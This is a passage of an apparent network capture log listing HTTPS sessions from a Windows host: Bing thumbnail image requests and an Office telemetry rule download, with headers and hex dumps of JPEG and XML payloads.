DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.6	49909	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:52 UTC	346	OUT	GET /th?id=OADD2.10239402613045_1Y7ZSJRVESY5KBVS8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:52 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 548153 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 048EEED4D19345C3A5870F3D4709F19B Ref B: EWR30EDGE0814 Ref C: 2024-11-25T23:25:52Z Date: Mon, 25 Nov 2024 23:25:52 GMT Connection: close
2024-11-25 23:25:52 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 e0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 3a 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 ac 87 69 00 04 00 00 00 01 00 00 00 c0 00 00 00 ec 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 36 2e 31 20 28 32 30 32 34 31 31 30 33 2e 6d 2e 32 38 33 34 20 31 34 64 33 65 37 34 29 20 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 31 31 3a 31 34 20 31 33 3a 34 36 3a 35 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 Data Ascii: JFIF``ExifMM*bj(1:r2i``Adobe Photoshop 26.1 (20241103.m.2834 14d3e74) (Windows)2024:11:14 13:46:588
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 86 e3 14 d6 15 2f 34 c6 14 c6 33 e5 34 73 4a c2 92 95 c0 4e 94 dc 53 e8 e6 8b 80 ce b4 62 96 8a 57 01 31 f2 d3 71 4f a4 fa 54 80 94 9d 29 68 a1 b1 d8 14 50 a2 97 14 bc d0 21 ab 47 b5 2b 51 8c 54 8c 5e 69 1a 96 8a 68 03 9a 1a 9d cd 0d 4f a0 c6 af a5 1f 2d 39 85 22 f1 4a e0 27 4f a5 2e 29 68 f9 68 01 b4 53 b1 de 93 14 c0 4a 29 dc d2 62 a4 43 58 52 37 14 e6 f4 a4 61 40 c6 b7 de a4 a7 35 35 87 cb 52 03 58 53 7a 53 9a 93 15 23 43 58 53 58 53 fa 52 62 81 8c 6a 4c 7c d4 e6 a3 18 6e 6a 00 6f 5a 4f 7a 75 23 0f 9a 8b 80 d6 14 62 96 8a 40 1c d3 5a 9d cd 23 0a 9b 80 dc 52 d3 b9 a4 c5 0d 80 8c 3e 5a 6d 49 cd 31 85 48 09 4a bf 76 97 9a 16 81 87 34 98 c2 d3 b1 8a 4a 9b 8c 46 a2 95 a8 a0 07 73 47 34 7f 0d 14 90 05 26 29 69 dc d5 5c 06 f4 5a 3e 51 4b fc 54 bc d5 26 21 bd Data Ascii: /434sJNSbW1qOT)hP!G+QT^ihO-9"J'O.)hhSJ)bCXR7a@55RXSzS#CXSXSRbjL\|njoZOzu#b@Z#R>ZmI1HJv4JFsG4&)i\Z>QKT&!
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: a7 de 69 af 6d 3e 9f 22 84 c8 39 24 3a 96 2f b4 8e 70 9c 8e 6b 0e 64 c5 7d 35 fb 67 47 bf c2 fa 54 b2 7c d2 7f 6b b2 79 9b 46 ec 7d 9c 9c 67 ad 7c df 75 18 12 52 c1 e2 be b1 4b 9e c6 94 f5 46 73 af cd 51 32 d5 a7 5c 54 2e 2b a6 e6 a5 69 07 a5 31 94 54 ec 2a 37 5c f5 a9 65 10 b8 a6 32 d4 ce 29 b8 a9 b9 44 4c 29 18 54 98 a6 b0 c5 40 11 b2 d2 6d 1d a9 f8 f9 69 79 a5 72 88 58 7c d4 98 a9 18 53 7d ea 6e 16 23 61 4d 61 52 d3 5b 8a 43 23 a3 9a 73 0a 4c 54 80 c6 14 d6 14 f6 a4 a5 71 8d 51 9a 46 19 a7 d3 7a d2 01 b8 f4 a3 9a 5c 66 8c 52 b8 0d 61 45 3f 9a 29 0e c5 6e ad 4b cd 26 3e 6a 55 e1 ab 31 0a b4 e5 14 8b 4b 8c 7d 29 dc 05 a3 1e 94 70 38 a5 51 4a e0 2e 31 4b ed 49 8c 53 b1 8a 00 1a 97 9a 14 52 a8 35 57 00 5a 72 0a 29 ff 00 5a 2e 01 f4 a5 a2 9d 40 07 34 2d 2e Data Ascii: im>"9$:/pkd}5gGT\|kyF}g\|uRKFsQ2\T.+i1T*7\e2)DL)T@miyrX\|S}n#aMaR[C#sLTqQFz\fRaE?)nK&>jU1K})p8QJ.1KISR5WZr)Z.@4-.
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: b8 86 0c cd c3 f4 0b cf 4e b5 f1 58 9c d7 33 c6 a5 57 0b 09 24 d3 56 ba 5e 8e d2 6b 75 b3 ea 76 51 9e 1a 9b b5 48 b9 6b 6d 15 d6 8f c8 e1 fe 2d 7c 3e d1 b4 7d 52 ce c7 46 92 e6 17 91 5b fe 3f fe 5f 31 38 28 c3 8f f7 87 fc 06 b1 fc 7b e0 0b 2d 03 e1 c6 99 7d 70 d3 7f 6b de 4e fb f6 b6 e8 64 84 7d d2 9c 0e 9d 0f d6 ba ef 1b 78 f3 c2 ba ff 00 c4 cb 3b fd 63 59 bb bf d2 6c ad a6 8c 28 d3 59 1d 9d be e1 f9 58 65 47 e0 6b 2b e3 bf 8e fc 3f af db d8 69 7a 56 b7 71 2d ad 92 6d 47 b9 d3 1b f7 69 80 36 8d a4 13 f5 3f dd af 47 01 81 cf 16 26 8d 19 36 e1 f1 36 dc 3b ed 2f 79 b5 a7 4d 7a 18 ce bd 15 4a 37 5e f2 5a e8 fb 6c b4 ef e8 78 5e a1 1e c6 6a ce 98 7c d5 a5 ad 5c 27 9c de 5b 2b 0d c7 6b 6d db b8 02 40 3b 72 71 9f 4e d5 8f 2c 85 bf 8a be ea 3a 68 79 f3 d7 50 61 Data Ascii: NX3W$V^kuvQHkm-\|>}RF[?_18({-}pkNd}x;cYl(YXeGk+?izVq-mGi6?G&66;/yMzJ7^Zlx^j\|\'[+km@;rqN,:hyPa
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 3f 28 ee f4 f3 ff 00 6c f3 54 34 3f b6 6e b3 d4 23 56 69 a2 b2 5b 95 56 f9 b7 4f 14 49 36 df a9 9b 4b b8 1f f0 36 a9 66 b6 b6 82 ea eb 49 8a 5f 2e cf f7 96 7e 7f fd 30 2e 6d 95 f3 ed 0d e6 9d 27 fd b2 cd 77 4f 5d 0b 47 41 ab 5b c7 73 f0 d6 28 a5 5f 96 f3 54 f2 3f 79 f7 be 60 47 fd f4 33 9f c2 9d e0 5b df 87 96 5e 00 8b 4b d5 35 a9 1b 58 b5 b9 94 ce be 5c d1 85 70 31 b3 e5 61 dd 40 ce 68 85 de ef e0 7f 87 ee e5 56 f3 2f b5 98 4c 9f c4 ac 4c 6f bb 9e c4 10 7e bb 4d 79 67 c5 c8 9f 4b f1 e5 cc e9 fe af 50 8d 6e 97 fd f6 f9 64 ff 00 c7 d5 bf 3a e1 c7 65 78 7c d2 83 c3 57 5a 5e e9 a6 d3 56 ec d3 47 a5 80 c4 ca 8c 9f 2b 6b d3 43 e8 37 f8 83 f0 e7 44 d1 75 26 d0 e3 9e 59 ae 10 c6 16 58 64 91 18 30 e7 ab 64 67 d3 22 b9 3d 4f e2 3a 6b 7e 0c b7 b0 36 96 11 35 b8 64 Data Ascii: ?(lT4?n#Vi[VOI6K6fI_.~0.m'wO]GA[s(_T?y`G3[^K5X\p1a@hV/LLo~MygKPnd:ex\|WZ^VG+kC7Du&YXd0dg"=O:k~65d
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 8f 0d bb f8 69 52 52 8d c7 cd 59 c3 0b 42 10 50 51 d0 d1 e2 aa b7 77 23 57 55 d7 6f af e4 8c ce cb fb be 17 6c 61 7f 95 41 0d ec fb b9 95 aa a3 4c 5b 89 3a 53 90 82 b9 49 55 47 4f 9a b6 50 8a 56 48 8f 69 29 3b b6 6a e9 fa d6 a7 65 26 f8 a7 dc 1b ef 2f f7 ab a9 b5 f1 45 95 fe 9b 21 b9 68 e0 95 58 7e ea 46 2c ac 3b e3 8f d2 b8 28 c3 ee fd df fd f5 4f 77 03 e4 3b 94 ff 00 b5 58 54 c3 53 9b bd b5 3a 68 e2 aa 53 56 bd d1 ea 5e 1e 7d 0e ff 00 cc 82 e3 c4 76 3a 38 58 b7 c7 2b 5b 19 1a 62 3f 81 76 82 11 8f 5c 9e 2a d6 93 e1 6b 61 a8 69 9a c6 ab f6 9f ec 5b cb 91 0b b4 52 c7 26 a1 22 e4 64 24 47 80 c7 3c 03 5e 47 1c 88 9c ed 66 1f de 5f 96 b5 74 3d 66 5b 3d 4a 3b db 79 55 9a 26 f9 56 55 de bd 30 3b 83 c7 e9 59 bc 23 51 6a 2c a9 62 9c e5 76 7b c7 8a 3e 1c f8 72 3f Data Ascii: iRRYBPQw#WUolaAL[:SIUGOPVHi);je&/E!hX~F,;(Ow;XTS:hSV^}v:8X+[b?v\*kai[R&"d$G<^Gf_t=f[=J;yU&VU0;Y#Qj,bv{>r?
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 29 81 4b 74 dc 7e 44 2a 48 39 f5 04 fc b8 a9 f4 bd 66 5b 2d 1e 48 0c b2 46 2e b0 fe 52 fd d6 2b 90 18 8f 5f 99 b1 e9 93 56 fc 69 a6 47 1e bd 75 a8 cf 6d f6 6b 75 93 3e 43 48 5d 99 db e6 09 b9 b9 38 f5 3d ab 9f b7 8c dc 5d 49 71 76 df bb 5e 64 6f e4 a3 eb 5e 8d 75 09 4e 56 da e7 9b b3 35 ec 6f e3 b6 b3 f3 df 6a c9 3f fa a5 6f 63 f7 bf 0e de a7 e9 5b 5e 0c b8 8d 2d e4 96 ee 5d b1 6e fd d2 b7 f1 3f af d3 3f ad 56 f0 f7 82 75 9f 10 f8 67 51 f1 5b a4 71 69 5a 54 b1 c3 3b 34 80 3f cd d1 62 4e af 81 e9 d3 a9 ac 0b ab 89 45 f7 99 1a f9 7b 57 64 71 ff 00 0c 60 74 15 c2 aa 51 ae e7 08 4a ee 3a 3f 27 d8 db df a7 69 49 6e 6d 6a b3 a3 6a 53 b3 aa b3 72 77 7d e6 a8 6d e5 31 43 c3 37 99 22 9f f8 08 3d 7f 3a a9 a7 93 73 24 92 dc fd d5 fb cc df 77 27 b7 f9 ed 56 6d 6d 2e Data Ascii: )Kt~D*H9f[-HF.R+_ViGumku>CH]8=]Iqv^do^uNV5oj?oc[^-]n??VugQ[qiZT;4?bNE{Wdq`tQJ:?'iInmjjSrw}m1C7"=:s$w'Vmm.
2024-11-25 23:25:53 UTC	16067	IN	Data Raw: 1f 45 d7 2d e7 97 49 9f 5d 91 59 b7 bd 93 db 66 36 80 82 65 74 f9 77 a8 0b d0 0c e7 15 e7 ff 00 b2 b4 da d7 83 3c 79 a9 e9 67 c3 16 57 d7 1b 9b fd 2d e1 df 24 25 62 df 88 b7 b2 85 de 4f 52 07 1d eb 73 e3 17 c5 99 af bc 5c 84 a7 9d 6d 6b 6a b0 4c b6 4b b5 da 46 53 be db 70 07 ee 12 43 60 e0 f4 ce 33 5f 35 99 e0 e7 f5 be 58 2b db c9 5f ef f9 9c 79 75 27 4a b2 7b 5f bb d3 d2 d6 d8 f3 8d 17 46 f8 69 61 a3 dc de e9 ba ad db 48 f3 84 f2 9f 78 69 08 e6 38 72 57 bb 73 c7 4e 09 e9 5e 4b 6c b7 7a f7 88 2e 6f f5 1b 9f 2a 28 bf 79 77 2a af fa 98 d7 e5 0a a3 d7 a2 28 af 59 b1 f1 17 82 1b 47 fb 0a 7c 3e d4 a5 bb 59 1b ec d3 aa 47 b2 39 5c fc ac 06 32 00 3b 45 79 f6 b1 a5 cb 69 bb c3 d6 d1 4f 2a ac a2 4b 99 22 5d cb 71 39 ff 00 d9 50 1d aa 3b 9c 9e f5 ed 64 ca 51 73 55 Data Ascii: E-I]Yf6etw<ygW-$%bORs\mkjLKFSpC`3_5X+_yu'J{_FiaHxi8rWsN^Klz.o(yw(YG\|>YG9\2;EyiO*K"]q9P;dQsU
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 1f c4 1b 53 fb 36 dd 6a ad e1 3d 02 04 b7 b9 ff 00 43 d2 e2 85 c5 b3 67 ef 48 c9 bb 3c f2 07 3e fd eb e8 73 bc b3 11 2c 3d 28 28 49 73 49 2b de 3d 74 e8 7a 14 f1 54 70 b3 53 54 57 de d9 f2 c5 f7 85 da ee d6 d5 ec e7 d3 56 18 e3 f2 da 45 b9 76 59 a4 04 ee 7e 17 82 78 e2 b3 ee b4 fd 66 ca 36 d3 ad a2 9e ee 16 5d f2 2d a7 98 f0 e7 a6 5b 80 32 2b d8 bc 49 f1 d3 4e 96 d2 d5 66 f8 67 e1 19 cc 59 1b 66 82 5f 97 e9 87 ab 5e 08 f8 95 61 2b 5d 6a 53 78 6b 47 d2 2d e7 88 04 b3 b0 8c aa 33 8c 80 f8 72 c7 fa 1f c2 b6 8f 0b e2 29 e1 d3 ad 4e 4e de 70 7a df d1 b3 d3 a7 88 8d 5c 5f 2c 17 25 d6 e9 f9 6d d8 f0 cb 1b 9b e8 af a5 d1 ad 97 52 5b 65 90 0b df 25 5d 51 b9 1b 99 c7 f7 47 bf 4a fa 73 c3 1e 3e d6 bc 17 e2 6d 63 c1 da 1d aa ad a4 37 b2 c3 65 6d 04 01 56 3b 64 93 ca Data Ascii: S6j=CgH<>s,=((IsI+=tzTpSTWVEvY~xf6]-[2+INfgYf_^a+]jSxkG-3r)NNpz\_,%mR[e%]QGJs>mc7emV;d
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: c7 8a fc ef 01 52 34 71 50 a9 d9 9a ba ad 91 4d 73 6c ed c7 fd f3 51 c9 2c 1b 70 2b 32 e3 89 2a 3f 30 f7 af dc 32 fc e5 54 a6 9d 8f 3f 11 37 73 5a dd 6d 9e 4c c8 8a cd fd ed b5 a5 74 74 d3 6b b4 44 bb bf d9 5d b5 cd c2 e3 75 5a 67 3e 5e 6b d6 8e 39 4e cd 8a 9d 4f 77 62 ae a0 b6 eb 70 de 5c 4b 8f f7 6a be 7e 6a 4b a2 4c 8c 69 aa 72 d5 f8 bf 17 d7 75 33 19 48 e8 a7 2b c5 1d 4f 84 9e 31 22 b4 8c d8 ff 00 66 bd 03 7e 90 6c e3 c3 6d 6d bf 36 e8 eb cc fc 3e f8 65 ae a2 19 33 6f 5f 9c e2 e3 cd 3d 5d 8e ca 35 2c ad 62 de aa d6 03 76 c6 56 ff 00 80 d6 4c 86 d0 72 1b 9a 4b e6 fb d5 9d 33 54 42 36 ea 29 55 d7 62 b6 b0 c0 c9 fb b6 e2 a2 b1 07 cc e2 92 e3 96 a9 74 fe 24 53 5d 49 fb b6 33 8d 9b 3b 5f 02 a9 6b a8 b7 f4 dd fd da fa 6f e0 ec 56 46 de 3f 3e 7f 2c 6d af 9a Data Ascii: R4qPMslQ,p+2*?02T?7sZmLttkD]uZg>^k9NOwbp\Kj~jKLiru3H+O1"f~lmm6>e3o_=]5,bvVLrK3TB6)Ubt$S]I3;_koVF?>,m

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.6	49910	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:52 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:53 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:52 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 4fa988ca-e01e-000c-2c91-3f8e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232552Z-174f7845968xlwnmhC1EWR0sv80000000uc000000000072g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:53 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.6	49911	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:52 UTC	375	OUT	GET /th?id=OADD2.10239402613046_1VJ8MQN6OLRO0EVHP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:53 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 595926 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: D38FF3A1EF0F417AA8CB3FB97A174330 Ref B: EWR30EDGE1617 Ref C: 2024-11-25T23:25:53Z Date: Mon, 25 Nov 2024 23:25:52 GMT Connection: close
2024-11-25 23:25:53 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a d4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 3a 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 ac 87 69 00 04 00 00 00 01 00 00 00 c0 00 00 00 ec 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 36 2e 31 20 28 32 30 32 34 31 31 30 33 2e 6d 2e 32 38 33 34 20 31 34 64 33 65 37 34 29 20 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 31 31 3a 31 34 20 31 33 3a 34 36 3a 30 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 Data Ascii: JFIF``ExifMM*bj(1:r2i``Adobe Photoshop 26.1 (20241103.m.2834 14d3e74) (Windows)2024:11:14 13:46:08
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: b9 86 14 98 a5 a5 f6 a0 42 73 47 34 6d a2 80 13 14 2d 2a d1 47 32 18 51 45 2a d5 29 21 58 6e 29 57 8a 1a 97 14 ee 31 28 a5 c5 1f c3 48 04 a2 97 14 63 34 5c 42 51 4e 5a 18 50 a4 30 e6 91 45 1f c5 4b f2 d5 5f 40 1b 8f 9a 97 14 b4 63 e6 a3 9b 41 07 34 98 c3 50 bc 50 b4 5c 01 7d 29 69 dc d1 cd 1c d7 0b 07 34 98 a5 e6 85 a7 70 0e 68 e6 8a 3f 8a 92 92 10 73 45 1d 29 56 86 c7 61 16 9d cd 14 7b d1 d0 46 26 29 79 a2 8a e1 24 39 a6 d3 b9 a3 9a 77 00 e6 91 a9 79 a3 9a 2e 03 68 a7 73 47 34 00 da 29 dc d2 30 a7 75 60 12 86 a7 73 4d a2 e0 0d 47 34 52 e2 a9 b2 44 a2 9d cd 1c d1 cc 03 69 5a 8c 52 f3 45 c0 39 a4 c5 2f 34 73 4e e0 22 d2 af 14 51 4c 04 c5 2a d1 45 1c c0 14 73 45 14 d3 60 14 ee 69 31 4b cd 55 c0 39 a3 9a 39 a7 73 4c 06 d1 4a d4 bc d1 71 d8 39 a2 85 e2 9d cd Data Ascii: BsG4m-G2QE)!Xn)W1(Hc4\BQNZP0EK_@cA4PP\})i4ph?sE)Va{F&)y$9wy.hsG4)0u`sMG4RDiZRE9/4sN"QL*EsE`i1KU99sLJq9
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: d4 2d 90 af 31 c9 e5 b3 7d 71 9f fc 7b 75 6a 64 47 e2 0d 9e 56 e2 d1 a9 f9 7e a6 b9 ff 00 86 7e 26 d1 3c 67 a6 cb a9 e8 90 5d c4 b0 5c f9 72 47 7a a1 5d 64 5f 9f 38 52 78 f9 eb 57 c4 1a bc 5a 5f 8d 2c 60 96 da 49 05 e5 b3 08 e4 56 1f 29 57 1c 73 fe f5 79 b2 bf 33 b9 b6 ab 43 e7 5f 8b 90 cb 6f e3 0d 63 fe 5b cb 1d ec be 5c 7f f3 f5 12 b3 dd 41 b7 fd a5 0d 79 17 d1 3d ab ce 75 0b 71 7e b2 41 04 bb bc b8 e3 82 3b 9f ba d2 44 e7 cc b3 b8 fa ab 7c 8c 7b 57 a2 7c 69 5b bf f8 4b b5 2b 48 a7 55 99 b5 49 85 a4 92 7c ad 0c e0 fd b6 db fe 02 eb 25 c4 7e 9f 91 ae 1a 48 a0 66 89 20 ff 00 45 b5 96 43 6d 1f 9b ff 00 2e a2 7f de 46 8f 9f e0 12 6e 1f a7 f7 ab d9 c2 4b f7 68 d3 a5 cc 9b 6b 82 db 6f 7e c7 b8 ed 9a f3 ec 9f 77 70 c7 97 a8 5a 7b 64 7e f4 0e c2 ac 49 1d ba da Data Ascii: -1}q{ujdGV~~&<g]\rGz]d_8RxWZ_,`IV)Wsy3C_oc[\Ay=uq~A;D\|{W\|i[K+HUI\|%~Hf ECm.FnKhko~wpZ{d~I
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 24 7a fc 11 c4 bb be cb 28 e2 59 62 c7 de 00 a9 dc 07 de f2 7f e9 aa e2 b5 cc 92 f8 66 e2 79 65 89 65 ba f0 f5 ea dc c9 6d bb 77 db b4 c9 b6 29 39 f5 1f b8 c9 f7 dd dd aa bc 33 de 69 b2 7d 9b 47 ff 00 49 b9 f0 be 75 5d 1a 49 17 fe 42 1a 44 c0 17 89 97 f8 80 5d 8c 47 65 f3 87 f0 8a ec 77 96 c0 4f af 45 3c 9e 6e a1 a5 45 1a dd e9 ff 00 f1 3b d3 e2 5f 9d 24 81 f8 9e 31 fd e4 f9 4e 47 fd 33 6f f9 ea 2b 9c 66 30 32 8d 2b e6 fb 32 b6 ad a2 6f f9 bc cb 76 cf 9f 6a df de c6 d7 c8 ef e5 c9 fd fa e8 34 df ed 3b 19 ad 62 f0 e7 ef 1a ce 36 d7 3c 2e d2 7c df 6a b3 61 9b 8b 26 fe f9 50 bf 77 d6 39 31 f7 96 b2 35 6b 4d 90 c7 75 a1 2b 45 6e d9 d6 74 06 fb cd 0e 0f ef ad bd c8 f2 fa 77 30 9f f9 e9 ce b4 dd b4 7f d7 f5 fe 60 8c e3 fe 8f 24 43 4b 6f 31 62 8d b5 0d 19 64 f9 Data Ascii: $z(Ybfyeemw)93i}GIu]IBD]GewOE<nE;_$1NG3o+f02+2ovj4;b6<.\|ja&Pw915kMu+Entw0`$CKo1bd
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 5c 66 a3 3a 57 a2 ae fb 74 bf 4f eb c8 9a da c6 d7 b1 d7 fe d0 30 78 52 db ca 83 49 d2 ad ad 66 66 05 5a da e6 46 5d 84 12 03 23 a8 c3 74 e8 4d 6d 7c 2f f0 b6 99 a6 68 2b 73 71 3f 87 f5 05 be 89 64 96 2b b9 36 4d 6e 30 78 4e 08 0d 9f 5a f1 af 1d 6a f2 6a 9a b4 72 cb 3f de c0 f9 5b 76 d0 a0 0a 92 e7 57 b8 8a 66 82 39 59 8e d0 15 7f 8b a5 79 f4 f0 75 e5 42 31 6d 5d ea d2 56 5f 24 ba 1c 96 e8 7a 27 c7 8d 37 c3 96 da 1d ac fa 62 c1 1d c6 e6 46 f2 ee e3 93 70 1d ca a2 2f e7 5e 23 6e e4 5f 49 9f f9 e7 5a 5a f6 ab 24 ca a9 24 bf 76 b9 d6 ba 97 cc 63 1c ac dd bb 57 d2 65 78 67 46 82 85 ca f8 56 e7 47 a3 ca 5a 49 7f eb a6 3f 4a a9 f1 92 4b 6f f8 47 74 a7 b7 58 36 cb 7f 72 56 5d c7 cc 60 89 12 e1 93 71 0a 32 4f 38 c9 f5 ec 2a 68 37 ef 14 92 49 2b 7e ef ae ef 7a 8b Data Ascii: \f:WtO0xRIffZF]#tMm\|/h+sq?d+6Mn0xNZjjr?[vWf9YyuB1m]V_$z'7bFp/^#n_IZZ$$vcWexgFVGZI?JKoGtX6rV]`q2O8*h7I+~z
2024-11-25 23:25:53 UTC	16384	IN	Data Raw: 14 0f fd 04 01 f9 0a e1 bc 33 69 67 7b ab 2d b5 fd f4 16 30 c8 a7 74 f2 ae e5 5e 3f ad 7b 98 4c 44 e7 87 8d 5a 8a ce da a3 c4 c6 51 84 2b 3a 70 77 46 6c 9a 95 cb 2c 80 ed c4 b1 2c 2d f2 8e 8b 8c 7e 3c 75 a7 5b 11 f6 75 cf f7 be ed 6d d9 e8 da 65 c7 8a a7 d2 bf b4 fc d8 b6 91 69 3d b5 b1 76 b8 93 1f 22 05 ce 7e 66 e3 da 99 e2 df 0d 6b 7e 1e 5f f8 9a 69 93 da 8f 31 92 36 96 32 8a c5 71 b8 0c 81 c8 c8 e3 ad 75 47 11 4b 99 46 f6 6c e7 f6 33 51 72 b6 88 8e d3 ec d2 2c ae eb 68 a5 a2 3e 5a b6 57 9f 6c 77 ad 5f 0d cd e1 e9 ae 25 9e ff 00 4c 81 ae 20 68 bc a8 1a 42 21 99 07 0f bb 9c ee ef c5 72 f1 aa 3d ab 4b f7 4c 6c 3e 5f ad 3a cc 49 1d 9b 5d 98 9b 6a b7 ca cc bf 2b 7e 34 aa 52 e7 4e ce cc d2 95 6e 56 9d 90 ba 95 b8 b6 d5 1e 20 d1 b7 97 29 1b a3 6d ca dc f6 ae Data Ascii: 